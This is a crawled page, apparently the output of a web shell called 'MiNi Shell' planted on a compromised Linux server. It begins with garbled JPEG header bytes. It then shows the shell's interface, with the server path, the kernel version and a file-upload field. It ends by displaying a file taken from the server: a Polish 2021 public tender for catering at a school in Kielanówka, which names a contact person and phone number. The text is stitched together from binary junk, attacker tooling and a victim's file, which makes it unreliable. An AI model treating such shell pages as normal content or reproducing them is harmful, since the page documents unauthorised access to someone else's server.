JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211209/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211209/0030771201-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> ŚWIADCZENIE W ROKU 2022 USŁUG CATERINGU – PRZYGOTOWANIE I DO-STAWA WYŻYWIENIA DLA DZIECI W WIEKU 3-6 LAT ORAZ DZIECI W WIE-KU 7-15 LAT </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">ZESPÓŁ SZKÓŁ W KIELANÓWCE</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 001131862</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">111</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kielanówka</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">35-106</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podkarpackie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL823 - Rzeszowski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sp.kielanowka@boguchwala.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://zskielanowka.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> ŚWIADCZENIE W ROKU 2022 USŁUG CATERINGU – PRZYGOTOWANIE I DO-STAWA WYŻYWIENIA DLA DZIECI W WIEKU 3-6 LAT ORAZ DZIECI W WIE-KU 7-15 LAT </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-37b06f59-58e4-11ec-8c2d-66c2f1230e9c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00307712</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-12-09</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.12.) Rodzaj wykonawców, którzy mogą ubiegać się o udzielenie zamówienia: </h3> <p class="mb-0">art. 94 ust. 1 pkt 2) ustawy</p> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl/ https://www.bip.boguchwala.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://epuap.gov.pl/wps/portal;https://miniportal.uzp.gov.pl; https://www.zskielanowka.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.	Informacje ogólne <br/>1.1.	W niniejszym postępowaniu komunikacja między Zamawiającym a Wykonawcami odbywa się drogą elektroniczną przy użyciu miniPortalu (https://miniportal.uzp.gov.pl/), ePUAPu (https://epuap.gov.pl/wps/portal) oraz poczty elektronicznej sp.kielanowka@boguchwala.pl na zasadach określonych poniżej. <br/>1.2.	Osobami uprawnionymi przez Zamawiającego do kontaktu z Wykonawcami są: <br/>Mariusz Kalandyk – wyjaśnienia w sprawie procedury przetargowej w godzinach: ponie-działek – piątek 900-1500: tel. 17 8592634 e-mail: sp.kielanowka@boguchwala.pl<br/><br/>1.3.	Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicz-nego, musi posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma do-stęp do „Formularzy: złożenia, zmiany, wycofania oferty lub wniosku” oraz do „Formularza do komunikacji”. <br/>1.4.	Wymagania techniczne i organizacyjne wysyłania i odbierania korespondencji elektronicznej przekazywanej przy ich użyciu, opisane zostały w Regulaminie korzystania z miniPortalu oraz warunkach korzystania z elektronicznej platformy usług administracji publicznej (ePUAP). <br/>1.5.	Wykonawca przystępując do niniejszego postępowania o udzielenie zamówienia publiczne-go, akceptuje warunki korzystania z miniPortalu, określone w Regulaminie miniPortalu oraz zobowiązuje się, korzystając z miniPortalu, przestrzegać postanowień tego regulaminu.<br/>1.6.	Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych „Formularzy do: złożenia i wycofania oferty” oraz do „Formularza do komunikacji” wynosi 150 MB.<br/>1.7.	Za datę przekazania oferty, oświadczenia, o którym mowa w art. 125 ust. 1 ustawy Pzp, podmiotowych środków dowodowych, przedmiotowych środków dowodowych oraz in-nych informacji, oświadczeń lub dokumentów, przekazywanych w postępowaniu, przyjmu-je się datę ich przekazania na ePUAP.<br/>1.8.	Zamawiający informuje, że przedmiotowe postępowanie można wyszukać na Liście wszystkich postępowań w miniPortaIu, klikając wcześniej opcję „Dla Wykonawców” lub ze strony głównej z zakładki „Postepowania&#34;. Jest ono dostępne równie na stronie internetowej Zamawiającego.<br/>1.9.	Zamawiający nie przewiduje sposobu komunikowania się z Wykonawcami w inny sposób niż przy użyciu środków komunikacji elektronicznej, wskazanych w swz.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">KOGO DOTYCZY INFORMACJA: STRONY UMOWY, OSOBY REPREZENTUJĄCE STRONY, OSOBY REALIZUJĄCE UMOWĘ<br/>1.	Kto wykorzystuje dane: Zespół Szkół w Kielanówce, Kielanówka 111; 35-106 Rzeszów (Zamawiający) – NIP: 8132200349, REGON: 001131862<br/>2.	Kontakt: Kielanówka 111; 35-106 Rzeszów, sp.kielanowka@boguchwala.pl. <br/>3.	Pomoc inspektora ochrony danych: iod@boguchwala.pl.<br/>4.	Kim jest inspektor ochrony danych: inspektor ochrony danych to niezależny specjalista w dziedzinie bezpieczeń-stwa danych osobowych. Przyjmuje pytania i wnioski związane z wykorzystywaniem danych osobowych oraz zgło-szenia o nieprawidłowościach.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">W związku z przetwarzaniem Pani/Pana danych osobowych<br/>przysługują Pani/Panu następują-ce uprawnienia: prawo dostępu dodanych osobowych, w tym prawo do uzyskania kopii tych danych; prawo do żądania sprostowania(poprawiania) danych osobowych – w przypadku gdy dane są nieprawidłowe lub niekompletne; prawo do żądania<br/>ograniczenia przetwarzania danychosobowych9. Nie przysługuje Pani/Panu: 8.1. w związku z art. 17<br/>ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;8.2. prawo do przenoszenia danych<br/>osobowych, o którym mowa w art. 20RODO;8.3. na podstawie art. 21 RODO prawo sprzeciwu, wobec<br/>przetwarzania danych osobowych,gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych<br/>jest art. 6 ust.1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">1/ZMPC/2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 3.2.	Do obowiązków Wykonawcy należy w szczególności:<br/>a) dla dzieci przedszkolnych przygotowanie i dostarczenie trzech posiłków dziennie tj. śnia-danie, obiad (dwudaniowy) i podwieczorek dla grupy maksymalnie 115 dzieci w okresie od 03.01.2022r. do 31.12.2022r. <br/> b) dla uczniów szkoły maksymalnie 110 sztuk dziennie dań obiadowych ( II danie + kompot) w okresie 03.01.2022r. do 31.12.2022r.<br/>2. Wartość kaloryczna posiłków dla dzieci przedszkolnych 950- 1050 kcal.<br/>3. Posiłki będą dostarczane od poniedziałku do piątku w godzinach uzgodnionych z Zama-wiającym. <br/>4. Zamawiający określa wielkość przedmiotu zamówienia w okresie trwania umowy tj.:<br/>a) posiłki dla dzieci przedszkolnych od 03.01.2022r. do 31.12.2022r. – 225 dni żywieniowych <br/> b) dla uczniów szkoły dań obiadowych ( II danie + kompot) od 03.01.2022r. do 31.12.2022r. 170 dni żywieniowych </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">55321000-6 - Usługi przygotowywania posiłków</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">55322000-3 - Usługi gotowania posiłków</p> <p class="mb-0">55520000-1 - Usługi dostarczania posiłków</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> aspekty społeczne, w tym integracja zawodowa i społeczna osób, o których mowa w art. 94 ust. 1 ustawy <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Kryterium społeczne - zatrudnienie do realizacji zamówienia osób bezrobotnych</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 2.1. Działając na podstawie art. 94 ust. 1 i 2 PZP, Zamawiający zastrzega, że o udzielenie<br/>zamówienia mogą się ubiegać wyłącznie Wykonawcy, którzy łącznie spełniają następujące<br/>warunki:<br/>a) mający status zakładu pracy chronionej, spółdzielnie socjalne oraz inni wyko-nawcy, których<br/>głównym celem lub głównym celem działalności ich wyod-rębnionych organizacyjnie jednostek,<br/>które będą realizowały zamówienie, jest społeczna i zawodowa integracja osób społecznie<br/>marginalizowanych, w ro-zumieniu art. 94 ust. 1 pkt 2 PZP, tj. osób bezrobotnych.<br/>b) posiadają procentowy wskaźnik zatrudnienia osób będących członkami grup społecznie<br/>marginalizowanych w rozumieniu art. 94 ust. 1 PZP nie mniejszy niż 30% spośród wszystkich<br/>osób zatrudnionych przez Wykonawcę (albo przez ww. jednostki, które będą realizować<br/>zamówienie) – przy czym osoby te powinny należeć do następującej grupy społecznie<br/>marginalizowanej w ro-zumieniu ww. przepisu: bezrobotnych w rozumieniu ustawy z dnia 20<br/>kwiet-nia 2004 r. o promocji zatrudnienia i instytucjach rynku pracy (Dz. U. z 2019 r. poz. 1482 i<br/>1622). W celu spełnienia ww. warunku, Zamawiający dopusz-cza zatrudnienie osób<br/>bezrobotnych (które nadal są w procesie integracji za-wodowej u Wykonawcy ubiegającego się<br/>o zamówieniu zastrzeżone), które miało miejsce w okresie do 3 lat przed złożeniem oferty.<br/>c) W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamó-wienia, każdy z tych<br/>Wykonawców musi spełniać wymogi wskazane w lit. a i b powyżej. Wykonawca nie może<br/>polegać na zasobach podmiotu trzeciego w zakresie wymogów wskazanych w lit. a i b powyżej.<br/>Zamawiający uzna, że osoba zatrudniona przez Wykonawcę należy do grupy bezrobotnych w<br/>rozu-mieniu ustawy z dnia 20 kwietnia 2004 r. o promocji zatrudnienia i instytu-cjach rynku pracy<br/>(Dz. U. z 2019 r. poz. 1482 i 1622), jeżeli osoba ta w chwi-li bezpośrednio poprzedzającej<br/>zatrudnienie u Wykonawcy (albo w ww. jed-nostce, która będzie realizować zamówienie) była<br/>bezrobotna w rozumieniu ustawy z dnia 20 kwietnia 2004 r. o promocji zatrudnienia i instytucjach<br/>ryn-ku pracy (Dz. U. z 2017 r. poz. 2046 z późn. zm.). zakresie wymogów wska-zanych w lit. a i<br/>b powyżej. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Każdy z Wykonawców ma obowiązek złożyć dokumenty lub oświadczenia<br/>potwierdzające:<br/>1) status wykonawcy jako zakładu pracy chronionej lub spółdzielni socjalnej lub dokumentów<br/>potwierdzających prowadzenie przez wykonawcę lub przez jego wyodrębnioną organizacyjnie<br/>jednostkę, która będzie realizowała za-mówienie, działalności, której głównym celem jest społeczna i<br/>zawodowa integracja osób społecznie marginalizowanych;<br/>2) procentowy wskaźnik zatrudnienia osób bezrobotnych, zatrudnionych przez zakłady pracy<br/>chronionej, spółdzielnie socjalne lub wykonawcę lub jego wyodrębnioną organizacyjnie jednostkę, która<br/>będzie realizowała za-mówienie w okresie do 3 lat przed złożeniem oferty.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 11. Treść oferty stanowi wypełniony:<br/>1) Formularz ofertowy – wg załącznika nr 1 do SWZ.<br/>12. Wraz z ofertą muszą zostać złożone:<br/>a) Oświadczenie Wykonawcy o spełnieniu warunków udziału w postępowaniu oraz o<br/>niepodleganiu wykluczeniu z postępowania – załącznik nr 2 do SWZ (w przypad-ku wspólnego<br/>ubiegania się o udzielenie zamówienia przez Wykonawców, oświad-czenie składa każdy z<br/>Wykonawców).<br/>b) Pełnomocnictwo upoważniające do złożenia oferty<br/>c)Pełnomocnictwo dla pełnomocnika do reprezentowania w postępowaniu Wyko-nawców<br/>wspólnie ubiegających się o udzielenie zamówienia <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/>2.	W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postę-powaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>3.	W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, wypełniony druk oświadczenia, wg Załącznika Nr 2 do SWZ składa każdy z Wykonawców wspólnie ubie-gających się o zamówienie. Dokumenty te potwierdzają spełnianie warunków udziału w oraz brak podstaw wykluczenia w zakresie, w którym każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu oraz brak podstaw wykluczenia. <br/>4.	Zgodnie z art. 117 ust. 4 ustawy Pzp, w przypadkach, o których mowa a art. 117 ust. 2 i 3 ustawy Pzp, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia składają oświad-czenie (zawarte w Formularzu ofertowym – Załącznik nr 1 do SWZ) z którego wynika, które usługi wykonują poszczególni wykonawcy. <br/>5.	Wspólnicy ponoszą solidarną odpowiedzialność za niewykonanie lub nienależyte wykona-nie zamówienia, określoną w art. 366 Kodeksu Cywilnego.<br/>6.	Wszelka korespondencja będzie prowadzona wyłącznie z pełnomocnikiem.<br/>7.	Przed podpisaniem umowy od Wykonawców ubiegających się wspólnie o zamówienie publiczne, których oferta została wybrana Zamawiający będzie żądać umowy regulującej ich współpracę. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Określone we wzorze umowy <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <p class="mb-0">obejmujące, zgodnie z art. 96 ustawy: - aspekty społeczne</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-12-17 09:30</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">miniportal Wykonawca składa ofertę za pośdrednictwem Formulara do złożenia, zmiany, wycofania oferty lub wniosku dostępnego na ePUAP i udostępnionego również na miniPortalu</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-12-17 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-01-15</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3> <h3 class="mb-0">8.6.) Maksymalna liczba wykonawców, którzy zostaną zaproszeni do negocjacji: <span class="normal">5</span></h3> <h3 class="mb-0">8.7) Kryteria oceny ofert, które zamawiający zamierza stosować w celu ograniczenia liczby wykonawców: </h3> cena oferty brutto

Creat By MiNi SheLL
Email: jattceo@gmail.com